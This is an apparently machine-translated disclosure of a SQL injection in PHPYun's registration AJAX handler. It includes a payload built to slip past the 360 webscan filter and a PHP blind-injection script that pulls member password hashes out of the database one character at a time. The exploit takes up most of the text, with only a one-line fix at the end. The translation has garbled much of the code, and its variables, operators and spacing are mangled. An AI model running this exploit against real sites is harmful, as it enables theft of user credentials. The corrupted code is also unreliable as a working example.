Phpyun injects a bypass 360 injection with exp

Phpyun injects a bypass 360 injection with exp

Single quotes can be introduced, but single quotes are not required here.

Although there are 360, the password can still be injected.

I wrote a script to run it. (The code is slow but can still run completely.)-It's Too scum to write anything.

In model/register. class. php.

 

function ajax_reg_action(){$post = array_keys($_POST);$key_name = $post[0];if($key_name=="username"){$username=@iconv("utf-8","gbk",$_POST['username']);if($this->config['sy_uc_type']=="uc_center"){$this->obj->uc_open();$user = uc_get_user($username);}else{$user = $this->obj->DB_select_once("member","`username`='".$username."'");}if($this->config['sy_regname']!=""){$regname=@explode(",",$this->config['sy_regname']);if(in_array($username,$regname)){echo 2;die;}}}else{$user = $this->obj->DB_select_once("member","`".$key_name."`='".$_POST[$key_name]."'");}if(is_array($user)){echo 1;}else{echo 0;}

First, here $ post = array_keys ($ _ POST );

Obtains the POST key. $ Key_name = $ post [0]; then $ key_name takes the first key from the array.



We all know that the global filtering of phpyun filters out single quotes, but it is for the value which is the key here, so we can completely introduce single quotes. However, you do not need to introduce single quotes here ..



Continue.
 

if($key_name=="username"){$username=@iconv("utf-8","gbk",$_POST['username']);if($this->config['sy_uc_type']=="uc_center"){$this->obj->uc_open();$user = uc_get_user($username);}else{

If $ key_name! = Username.



$ This-> obj-> DB_select_once ("member", "'". $ key_name. "' = '". $ _ POST [$ key_name]. "'");

Then it is directly brought into the query and the key is used.



The statement executed here is



SELECT * FROM phpyun_member WHERE 'xx' = 'asd'



Here xx and asd are both controllable. Here asd is definitely not usable because it will be escaped in single quotation marks of value.



Here, we will control the key and construct it here.



Because the key cannot contain spaces, replace the space with the + number.



Here we construct the key



Username' or % 2Bif (ascii (substr (password, $ yu, 1) = $ I, 1, 0) # = asd



360 webscan is available, but this statement can be passed through 360webscan.



However, here the key cannot contain the = sign, which will be replaced with '=



Replace = with <>



Username' or % 2Bif (ascii (substr (password, $ yu, 1) <> $ I, 1, 0) # = asd



In this case, if the value of $ I is queried and the value of $ I is equal, 0 is output. In other cases, 1 is output.



Here is a small script.





P.S. I have never learned a language .. All of them are blind. The 74cms that was just written earlier is similar to the current one. You just need to change it.
 

 

<? Php $ host = $ argv [1]; $ yu = 1; for ($ I = 0; I I <120; $ I ++) {$ lenth = strlen ($ result); if ($ lenth = 32) {echo "\ r \ n"; echo "OK The password is: $ result "; exit ;}; $ content = "username' or % 2Bif (ascii (substr (password, $ yu, 1) <> $ I,) # = asd "; $ url = $ host. '/index. php? M = register & c = ajax_reg '; // receives the XML address $ header = "Content-type: text/xml"; $ ch = curl_init (); curl_setopt ($ ch, CURLOPT_URL, $ url); curl_setopt ($ ch, expires, 1); // curl_setopt ($ ch, CURLOPT_HTTPHEADER, $ header); curl_setopt ($ ch, CURLOPT_POST, 1 ); curl_setopt ($ ch, CURLOPT_POSTFIELDS, $ content); $ response = curl_exec ($ ch); if (curl_errno ($ ch) {print curl_error ($ ch );} curl_close ($ ch); if (eregi ('0', $ respo AUC) {echo chr ($ I); $ result. = chr ($ I); $ lenth = strlen ($ result); $ yu = ++ $ yu; $ I = 0 ;}}?>

 

The script runs the same password as the user in the database.



-The script is too scum and the speed is slow.
 

Solution:

Restrict the key.